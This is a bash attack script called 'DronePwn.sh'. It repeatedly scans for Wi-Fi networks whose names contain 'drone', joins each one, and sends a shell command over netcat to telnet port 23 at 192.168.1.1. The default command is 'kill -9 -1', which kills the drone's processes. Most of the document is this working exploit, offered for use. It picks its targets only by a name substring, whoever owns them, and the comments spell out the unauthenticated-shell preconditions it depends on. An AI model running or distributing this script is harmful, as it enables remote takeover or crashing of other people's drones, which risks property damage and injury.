# DronePwn.sh
# Based on Darren Kitchen's concept
# Written for OS X 10.9 (but will probably work on most other versions)
# Written by Tesla while very bored
# Usage: bash dronepwn.sh [interface] [shell command to run on drone]
# Both arguments are optional
#!/bin/bash
# Globals shared by the functions and the main flow below.
# Wireless interface name: taken from $1 or auto-detected further down.
INTERFACE=""
# Text piped to the remote service: taken from $2 or defaulted further down.
COMMAND=""
# Flipped to true by the SIGINT handler (abrt) and polled by the main flow.
ABRT_WHEN_POSSIBLE=false
# Print an error line in red, then reset the foreground colour.
# Arguments: $1 - message text (further arguments are ignored)
# Outputs:   the coloured message and a newline on stdout
error() {
  local text="$1"
  printf "\e[31m%s\e[39m\n" "$text"
}
# Print a warning line in yellow, then reset all text attributes.
# Arguments: $1 - message text (further arguments are ignored)
# Outputs:   the coloured message and a newline on stdout
warn() {
  local text="$1"
  printf "\e[33m%s\e[0m\n" "$text"
}
# Print a status line in bold blue, then reset all text attributes.
# Arguments: $1 - message text (further arguments are ignored)
# Outputs:   the coloured message and a newline on stdout
log() {
  local text="$1"
  printf "\e[1m\e[34m%s\e[0m\n" "$text"
}
# Print a success line in bold green, then reset all text attributes.
# Arguments: $1 - message text (further arguments are ignored)
# Outputs:   the coloured message and a newline on stdout
good() {
  local text="$1"
  printf "\e[1m\e[32m%s\e[0m\n" "$text"
}
# SIGINT handler: announce the interrupt and raise the stop flag.
# It does not exit by itself; the main flow polls ABRT_WHEN_POSSIBLE and
# exits at its next checkpoint.
# Globals: ABRT_WHEN_POSSIBLE (written)
abrt() {
  log "[*] Caught interrupt, finishing. . ."
  ABRT_WHEN_POSSIBLE=true
}
# Joins the given Wi-Fi network and pipes $COMMAND to TCP port 23 of
# 192.168.1.1.
# Globals:   INTERFACE (read), COMMAND (read)
# Arguments: $1 - ESSID to associate with
# Outputs:   status lines via log/error; whatever nc prints goes to stdout
#
# What the code depends on: networksetup is given no password argument, and
# the command text is written to the socket with no login exchange. It can
# therefore only have an effect where the access point is open and the
# port-23 service presumably hands out a shell without authentication
# (confirm against the device in question). A passphrase-protected AP, or a
# disabled or authenticated port-23 service, removes those preconditions.
# Seen from the network, a pass would presumably look like a fresh client
# association followed by a short TCP/23 session.
function pwn_network {
# networksetup's stdout and stderr are discarded; only its exit status is used.
if networksetup -setairportnetwork $INTERFACE $1 > /dev/null 2>/dev/null
then
log "[*] Success!"
log "[*] Attemting to connect and issue kill command. . ."
# $COMMAND is the printf format string here, so printf interprets any
# % sequences and backslash escapes it contains. nc's exit status is not checked.
printf "$COMMAND\n\n" | nc 192.168.1.1 23
log "[*] Moving to next AP (if any). . ."
else
error "[!] Failed to associate!"
fi
}
# Calls pwn_network once per word of the first argument.
# Arguments: $1 - ESSID list; it is expanded unquoted, so the shell splits it
#                 on whitespace and applies glob expansion. Only $1 is read.
# Outputs:   one log line per ESSID, plus pwn_network's output
function pwn_networks {
for ntwrk in $1
do
log "[*] Attemting to associate with ESSID: ${ntwrk}. . ."
pwn_network "${ntwrk}"
done
}
# Main flow: install the SIGINT handler, resolve INTERFACE and COMMAND from
# the positional arguments, then scan in a loop with a one-second pause.
# SIGINT does not stop the script directly: abrt only sets
# ABRT_WHEN_POSSIBLE, and that flag is polled at the checkpoints below.
trap abrt SIGINT
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
# $1 (optional): wireless interface name.
if [[ -z $1 ]]
then
log "[-] No interface specified, attemting to determine wireless interface (this will not work if you are currently not connected to a network). . ."
# Drop ifconfig lines mentioning 127.0.0.1 or 'bridge', keep each dotted-quad
# line with the three lines before it, then take the first field of the
# 'flags' header line and strip the colon to get the interface name.
INTERFACE=$(ifconfig | grep -v '127.0.0.1' | grep -v 'bridge' | grep -B3 -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep flags | awk '{print $1}' | sed 's/://g')
good "[+] Selected $INTERFACE as wireless interface"
else
INTERFACE=$1
fi
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
# $2 (optional): command text to send. The default, kill -9 -1, sends SIGKILL
# to every process the invoking user is allowed to signal.
if [[ -z $2 ]]
then
COMMAND="kill -9 -1"
log "[*] Custom command left blank, using \"kill -9 -1\""
else
COMMAND=$2
fi
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
# Runs until the SIGINT flag is seen at the checkpoint inside the loop.
while (true) do
log "[*] Scanning for APs with ESSIDs that contain 'drone'. . ."
# airport -s lists visible networks; lines containing 'drone' (case-sensitive)
# are kept and their first column is treated as the ESSID. The name substring
# is the only selection criterion: nothing here identifies the device model
# or who operates it.
ntwrks=( $(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | grep 'drone' | awk '{print $1}') )
pwn_networks "${ntwrks[@]}"
if [[ $ABRT_WHEN_POSSIBLE = true ]]; then exit 0; fi
sleep 1
done